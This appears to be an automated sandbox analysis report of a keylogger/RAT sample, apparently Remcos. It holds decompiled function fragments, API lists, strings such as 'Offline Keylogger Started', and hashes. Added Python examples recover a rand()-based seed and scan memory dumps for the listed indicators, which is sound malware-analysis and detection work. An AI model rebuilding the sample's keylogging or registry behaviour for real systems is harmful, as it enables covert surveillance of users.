                                  • Uniqueness Score: -1.00%

                                   C-Code - Quality: 64%
                                   			E0040DCD4() {
                                   				void* _t15;
                                   				intOrPtr _t19;
                                   
                                   				E0040AC8C();                                                                         /* 0x0040dcd4 */
                                   				exit(0);                                                                             /* 0x0040dcdb */
                                   				while(1) {                                                                           /* 0x0040dce3 */
                                   					_t19 =  *0x41beb8; // 0x0                                                           /* 0x0040dce3 */
                                   					if(_t19 == 0) {                                                                     /* 0x0040dce9 */
                                   						break;                                                                             /* 0x00000000 */
                                   					}                                                                                   /* 0x00000000 */
                                   					Sleep(0x64); // 100 ms; spins until the global at 0x41beb8 is cleared (stalling loop) /* 0x0040dced */
                                   				}                                                                                    /* 0x0040dced */
                                   				E00408245();                                                                         /* 0x0040dcf5 */
                                   				E004017DD(_t15 - 0x10);                                                              /* 0x0040e6a4 */
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();     /* 0x0040e6ac */
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();     /* 0x0040e6b5 */
                                   				return 0;                                                                            /* 0x0040e6c1 */
                                   			}

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • exit.MSVCRT ref: 0040DCDB
                                  • Sleep.KERNEL32(00000064), ref: 0040DCED
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                  • String ID:
                                  • API String ID: 772260455-0
                                  • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                  • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • recv.WS2_32(?,?,0000FDE8,00000000), ref: 10544EA6
                                    • Part of subcall function 105539CA: GetLocalTime.KERNEL32(?), ref: 105539E1
                                    • Part of subcall function 105539CA: printf.MSVCRT ref: 10553A4E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTimeprintfrecv
                                  • String ID: [DEBUG]$dVA
                                  • API String ID: 875807815-1987307633
                                  • Opcode ID: b60463dbdbff701d3f326422711d0b02361bd4feaec76e4a133b4563da488f67
                                  • Instruction ID: aa6222fac86f690c9735488f1a1259fe0ebb3ebd254a4c11fdf5479a0761db50
                                  • Opcode Fuzzy Hash: b60463dbdbff701d3f326422711d0b02361bd4feaec76e4a133b4563da488f67
                                  • Instruction Fuzzy Hash: 8E81087290050DEBCB04AB90DC999EEBF79EB84355F104065F516E31A0EF706A89CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                   C-Code - Quality: 34%
                                   			E1054D7C3(char _a4, short* _a20, intOrPtr _a24, char _a27) {
                                   				void* _v8;
                                   				char _v24;
                                   				char _v40;
                                   				char _v56;
                                   				char _v72;
                                   				char _v88;
                                   				char _v104;
                                   				char _v120;
                                   				char _v136;
                                   				char _v152;
                                   				void* _t29;
                                   				long _t30;
                                   				void* _t38;
                                   				char* _t41;
                                   				char* _t42;
                                   				char* _t43;
                                   				char* _t44;
                                   				char* _t45;
                                   				char* _t46;
                                   				char* _t47;
                                   				void* _t70;
                                   				void* _t72;
                                   				void* _t89;
                                   				void* _t93;
                                   				void* _t95;
                                   
                                   				 *0x41533c();                                                                        /* 0x1054d7d8 */
                                   				_t29 = E1054D72A( &_a4);                                                             /* 0x1054d7de */
                                   				_t95 = _t93 - 0x10 + 0x10;                                                           /* 0x1054d7e3 */
                                   				_t63 = 0;                                                                            /* 0x1054d7e9 */
                                   				_t30 = RegOpenKeyExW(_t29, _a20, 0, 0x20019,  &_v8); // 0x20019 == KEY_READ          /* 0x1054d7f6 */
                                   				_t106 = _t30;                                                                        /* 0x1054d7fc */
                                   				if(_t30 != 0) {                                                                      /* 0x1054d7fe */
                                   					 *0x415318( &_a27);                                                                 /* 0x1054d979 */
                                   					E10543A51(0x41bde0, 0x72, 0x415b1c);                                                /* 0x1054d986 */
                                   				} else {                                                                             /* 0x1054d804 */
                                   					E1054D4AF( &_v8, _t106, _v8); // subcall walks the subkeys via RegQueryInfoKeyW / RegEnumKeyExW (see APIs below) /* 0x1054d807 */
                                   					_pop(_t70);                                                                         /* 0x1054d80f */
                                   					_t89 = 0x415b14;                                                                    /* 0x1054d810 */
                                   					if(_a24 != 0) {                                                                     /* 0x1054d815 */
                                   						_t89 = 0x415908;                                                                   /* 0x1054d817 */
                                   					}                                                                                   /* 0x1054d817 */
                                   					_t38 = E105541E4(_t70,  &_v152, 0x41bdd0);                                          /* 0x1054d83e */
                                   					_t72 = 0x41b310;                                                                    /* 0x1054d844 */
                                   					_t41 =  &_v88;                                                                      /* 0x1054d859 */
                                   					L10555B05();                                                                        /* 0x1054d85e */
                                   					_t42 =  &_v56;                                                                      /* 0x1054d867 */
                                   					L10555ACF();                                                                        /* 0x1054d86b */
                                   					_t43 =  &_v40;                                                                      /* 0x1054d874 */
                                   					L10555ACF();                                                                        /* 0x1054d878 */
                                   					_t44 =  &_v24;                                                                      /* 0x1054d881 */
                                   					L10555ACF();                                                                        /* 0x1054d885 */
                                   					_t45 =  &_v72;                                                                      /* 0x1054d88e */
                                   					L10555ACF();                                                                        /* 0x1054d892 */
                                   					_t46 =  &_v104;                                                                     /* 0x1054d89b */
                                   					L10555ACF();                                                                        /* 0x1054d89f */
                                   					_t47 =  &_v136;                                                                     /* 0x1054d8a8 */
                                   					L10555ACF();                                                                        /* 0x1054d8af */
                                   					L10555ACF();                                                                        /* 0x1054d8b9 */
                                   					E10543A51(0x41bde0, 0x71, _t95 - 0x10);                                             /* 0x1054d8c8 */
                                   					 *0x415348(_t47, _t47, _t46, _t46, _t45, _t45, _t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t89, 0x41b310, E105541E4(_t72,  &_v120, 0x41be40), 0x41b310, _t38, 0x41be30, 0x41b310, 0x41be50); /* 0x1054d8d3 */
                                   					 *0x415348();                                                                       /* 0x1054d8dc */
                                   					 *0x415348();                                                                       /* 0x1054d8e5 */
                                   					 *0x415348();                                                                       /* 0x1054d8ee */
                                   					 *0x415348();                                                                       /* 0x1054d8f7 */
                                   					 *0x415348();                                                                       /* 0x1054d900 */
                                   					 *0x415348();                                                                       /* 0x1054d909 */
                                   					 *0x415348();                                                                       /* 0x1054d912 */
                                   					 *0x415348();                                                                       /* 0x1054d91e */
                                   					 *0x415204(0x415800);                                                               /* 0x1054d92f */
                                   					 *0x415204(0x415800);                                                               /* 0x1054d93b */
                                   					 *0x4152c8(0x415664);                                                               /* 0x1054d94c */
                                   					 *0x4152c8(0x415664);                                                               /* 0x1054d958 */
                                   					RegCloseKey(_v8);                                                                   /* 0x1054d961 */
                                   					_t63 = 1;                                                                           /* 0x1054d967 */
                                   				}                                                                                    /* 0x1054d967 */
                                   				 *0x415348();                                                                        /* 0x1054d98e */
                                   				return _t63;                                                                         /* 0x1054d99a */
                                   			}

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 1054D7F6
                                    • Part of subcall function 1054D4AF: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 1054D51E
                                    • Part of subcall function 1054D4AF: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 1054D54D
                                  • RegCloseKey.ADVAPI32(?), ref: 1054D961
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumInfoOpenQuery
                                  • String ID: dVA
                                  • API String ID: 1014704025-1571107130
                                  • Opcode ID: 4bf7dbed2e387c0bd0de4252c66f152a840cf4cd46a27f5795bf2d5b6f164994
                                  • Instruction ID: 75c8405a0be73e898a2ec8cd587b5051b530d4c1a808a09827ed6db2f08eab39
                                  • Opcode Fuzzy Hash: 4bf7dbed2e387c0bd0de4252c66f152a840cf4cd46a27f5795bf2d5b6f164994
                                  • Instruction Fuzzy Hash: 2441627690020CEBCB04ABE0ED5EDDE7F2CDB94245B144036F506D7161EB746E48CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 1054CE57: RegOpenKeyExA.ADVAPI32(80000001,105493F8,00000000,00020019,105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE76
                                    • Part of subcall function 1054CE57: RegQueryValueExA.ADVAPI32(105493F8,?,00000000,80000001,?,00000000,80000001,?,?,?,105493F8,80000001,00000000), ref: 1054CE94
                                    • Part of subcall function 1054CE57: RegCloseKey.ADVAPI32(105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE9F
                                  • Sleep.KERNEL32(00000BB8), ref: 1054B789
                                  • exit.MSVCRT ref: 1054B806
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.1 Pro
                                  • API String ID: 3482962480-3399156737
                                  • Opcode ID: 86934927d20916fc64d935251dca7813c93599dfcb48ba5906bae101e05e4fe0
                                  • Instruction ID: a18f593abc72bbea4445ab1689bdc3d003340f84491b9807259f987cf71152be
                                  • Opcode Fuzzy Hash: 86934927d20916fc64d935251dca7813c93599dfcb48ba5906bae101e05e4fe0
                                  • Instruction Fuzzy Hash: B831C472A40508BBE704B7E49C4EAFE7F6CEFC4341F640065F911C6190EFA5598187AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 10553E64
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 4228891388-1277644989
                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 7b6e0534dd4ebdc394a94ad9b7d895b79d61f29221bdbf90dbfad6202f42536d
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: A511087354020DEBCB04EBA1EC49AEE3BB9EB80361F104026FD01E71D0DA719905CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%
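
The record above pairs srand()/time() with the alphabet string at 10553E64, the usual shape of a routine that builds a random lowercase name (for a dropped file, a mutex or a registry value). The report does not show how the characters are picked, so the following added example, which is not code from the report or from the sample, assumes srand(time(NULL)) with alphabet[rand() % 26] per character and a name length of 8, and models MSVCRT's rand() exactly (the 214013 / 2531011 LCG with 15-bit output). The point for a responder is that a name built this way is a function of the creation second: two runs in the same second produce the same name, and a recovered name can be matched back to its timestamp by trying a known window of seconds.

```python
"""Added example, not code from the Joe Sandbox report or from the sample.

ASSUMED generation scheme (the report only shows srand/time and the alphabet):
    srand(time(NULL));  name[i] = alphabet[rand() % 26];
MSVCRT rand() is modelled exactly: seed = seed * 214013 + 2531011 (mod 2^32),
result = (seed >> 16) & 0x7fff.
"""
import time

ALPHABET = "abcdefghijklmnopqrstuvwxyz"  # string referenced at 10553E64 in the dump
NAME_LEN = 8                              # assumption; the report does not show the length


class MsvcrtRand:
    """Model of MSVCRT srand()/rand(): 32-bit LCG state, 15-bit output."""

    def __init__(self, seed: int) -> None:
        self.state = seed & 0xFFFFFFFF

    def rand(self) -> int:
        self.state = (self.state * 214013 + 2531011) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF


def random_name(seed: int, length: int = NAME_LEN) -> str:
    """Name the assumed routine would build after srand(seed)."""
    rng = MsvcrtRand(seed)
    return "".join(ALPHABET[rng.rand() % len(ALPHABET)] for _ in range(length))


def recover_seed(name: str, t_start: int, t_end: int):
    """Return the first second in [t_start, t_end] whose name equals `name`, else None.

    time() is seconds since the epoch, so a responder who knows roughly when the
    artifact appeared (e.g. from MFT timestamps) only has to try that window:
    a day is 86,400 candidates, each costing len(name) LCG steps.
    """
    for seed in range(t_start, t_end + 1):
        if random_name(seed, len(name)) == name:
            return seed
    return None


if __name__ == "__main__":
    now = int(time.time())
    name = random_name(now)
    print(f"seed {now} -> {name}")
    # Recover the seed from the name alone, given a one-hour window around the sighting.
    print("recovered seed:", recover_seed(name, now - 3600, now + 60))
```

The LCG constants and the 15-bit output are the documented behaviour of MSVCRT's rand(); with srand(1) the generator yields 41, 18467, 6334, ..., which is a quick way to confirm the model against a real Windows build. Only the way the sample maps rand() onto the alphabet is assumed here.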

                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 1054774F
                                    • Part of subcall function 10547762: GetLocalTime.KERNEL32(?,?,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,10546B55), ref: 10547770
                                    • Part of subcall function 10547762: malloc.MSVCRT ref: 105477C6
                                    • Part of subcall function 10547762: sprintf.MSVCRT ref: 105477F8
                                    • Part of subcall function 10547762: SetEvent.KERNEL32(?), ref: 10547824
                                    • Part of subcall function 10547762: ??3@YAXPAX@Z.MSVCRT ref: 1054782B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??3@EventHookLocalTimeUnhookWindowsmallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 1154738628-1731565019
                                  • Opcode ID: 192f14234bd1f161141e7922fad76bd8ff8d85d38597ce7ceab77fd8c64afa54
                                  • Instruction ID: 16db7a6f5776c89e8ab68abe360fc14926a6cd3dd93f8be0b6baa1f2fab2ce64
                                  • Opcode Fuzzy Hash: 192f14234bd1f161141e7922fad76bd8ff8d85d38597ce7ceab77fd8c64afa54
                                  • Instruction Fuzzy Hash: 8F012D71A1024C6BE7006734CC497FE7FFCEB82150F904459E842C2641E7F8594987E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                   C-Code - Quality: 19%
                                   			E105475F1(void* __ecx) {
                                   				void* _t14;
                                   				void* _t22;
                                   				void* _t23;
                                   
                                   				_t22 = __ecx;                                                                        /* 0x105475f9 */
                                   				 *(_t22 + 0x34) = CreateEventA(0, 0, 0, 0); // unnamed auto-reset event, initially non-signaled /* 0x10547606 */
                                   				if( *((char*)(_t22 + 0x3d)) != 0) {                                                  /* 0x10547609 */
                                   					_t14 = _t22 + 0x14;                                                                 /* 0x1054760b */
                                   					do {                                                                                /* 0x10547613 */
                                   						_push(0x415664);                                                                   /* 0x10547613 */
                                   						_push(_t14);                                                                       /* 0x10547614 */
                                   						if( *0x4152e0() != 0) {                                                            /* 0x1054761f */
                                   							_t23 = _t23 - 0x10;                                                               /* 0x10547621 */
                                   							 *0x41533c();                                                                     /* 0x10547627 */
                                   							E10543A51(0x41be70, 0x5a, _t14);                                                  /* 0x10547634 */
                                   							 *0x4152c8(0x415664);                                                             /* 0x1054763c */
                                   						}                                                                                  /* 0x1054763c */
                                   						WaitForSingleObject( *(_t22 + 0x34), 0xffffffff); // INFINITE; blocks until the event is signaled /* 0x10547647 */
                                   					} while ( *((char*)(_t22 + 0x3d)) != 0);                                            /* 0x1054764d */
                                   				}                                                                                    /* 0x10547613 */
                                   				return 1;                                                                            /* 0x10547658 */
                                   			}

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,10546C42), ref: 105475FC
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10547647
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventObjectSingleWait
                                  • String ID: dVA
                                  • API String ID: 2678385144-1571107130
                                  • Opcode ID: faacb40d7c9ee4e4a379f73a54fcd7153b1e31e1dd7eb579bd7be44ae1484f67
                                  • Instruction ID: 1713aa071702119b5773a4f4598c3859c02d546d954d0f19aef28d3582161336
                                  • Opcode Fuzzy Hash: faacb40d7c9ee4e4a379f73a54fcd7153b1e31e1dd7eb579bd7be44ae1484f67
                                  • Instruction Fuzzy Hash: 8DF02275500B04BBDB105B289D8CBE73FAEEBC2361B50992DF453C2891CB61A8408B74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [LCtrl] $ [RCtrl]
                                  • API String ID: 4257247948-618823999
                                  • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                  • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%
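
The strings in the records above ([DEBUG] beside the recv() handler, [INFO] and "Offline Keylogger Stopped" beside UnhookWindowsHookEx, "2.7.1 Pro" beside the HKCU registry read, and [LCtrl] / [RCtrl] in the key-name builder) are what the report's Strings sections surface from the 10540000 and 00400000 dumps. The scanner below is an added example, not part of the report or of the sample: a stand-alone Python equivalent of that Strings pass that pulls both narrow and UTF-16LE printable runs out of a memory dump and reports the offset and encoding of each indicator it finds. SAMPLE_DUMP is constructed for the example (the wide copy of [LCtrl] is there to exercise the UTF-16LE path; in the report that string is narrow), and the indicator list is only what this page shows, not a full Remcos signature.

```python
"""Added example, not code from the Joe Sandbox report or from the sample."""
import re
import sys
from typing import Iterator, List, Tuple

# Indicator strings taken from the function records on this page. This is what the
# page shows, not a complete Remcos signature.
INDICATORS: Tuple[str, ...] = (
    "Offline Keylogger Started",
    "Offline Keylogger Stopped",
    "[DEBUG]",
    "[INFO]",
    "2.7.1 Pro",
    "[LCtrl]",
    "[RCtrl]",
)

MIN_LEN = 4
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)            # narrow printable run
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)     # UTF-16LE printable run

# Constructed sample dump for the example (NOT bytes from the report's .sdmp files).
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"[DEBUG]\x00"                                   # narrow, as logged by the recv() handler
    + b"\x90" * 5
    + b"Offline Keylogger Stopped\x00"                 # narrow, as in the UnhookWindowsHookEx path
    + b"2.7.1 Pro\x00"                                 # narrow version tag
    + "[LCtrl] ".encode("utf-16-le") + b"\x00\x00"     # wide copy, constructed to exercise UTF-16LE
    + b"\xcc" * 8
)


def extract_strings(data: bytes) -> Iterator[Tuple[int, str, str]]:
    """Yield (offset, encoding, text) for every printable run, narrow and UTF-16LE,
    the way the report's Strings section does."""
    for m in ASCII_RUN.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in WIDE_RUN.finditer(data):
        yield m.start(), "utf-16le", m.group().decode("utf-16-le")


def scan(data: bytes, indicators=INDICATORS) -> List[Tuple[int, str, str]]:
    """Return sorted (offset, encoding, indicator) tuples for each indicator found.

    The offset points at the indicator itself, not at the start of the run it sits in:
    a wide run can start earlier on a stray char+NUL pair that precedes the string
    (the trailing "o\\x00" of the narrow "2.7.1 Pro" in SAMPLE_DUMP does exactly that).
    """
    hits = set()
    for run_off, enc, text in extract_strings(data):
        width = 2 if enc == "utf-16le" else 1
        for ind in indicators:
            pos = text.find(ind)
            while pos != -1:
                hits.add((run_off + pos * width, enc, ind))
                pos = text.find(ind, pos + 1)
    return sorted(hits)


if __name__ == "__main__":
    # Usage: python scan.py <dump.sdmp>; without an argument the constructed sample is scanned.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for off, enc, ind in scan(blob):
        print(f"{off:#010x} {enc:<8} {ind}")
```

Run it against one of the .sdmp dumps named in the Source File lines of these records to get the same offsets the report's xrefs point at; scanning both encodings matters because the keylogger strings here sit in narrow std::string buffers while the registry paths in the same module go through the W-APIs.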

                                  APIs
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                  • String ID: open
                                  • API String ID: 317973523-2758837156
                                  • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                  • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                  Uniqueness

                                  Uniqueness Score: -1.00%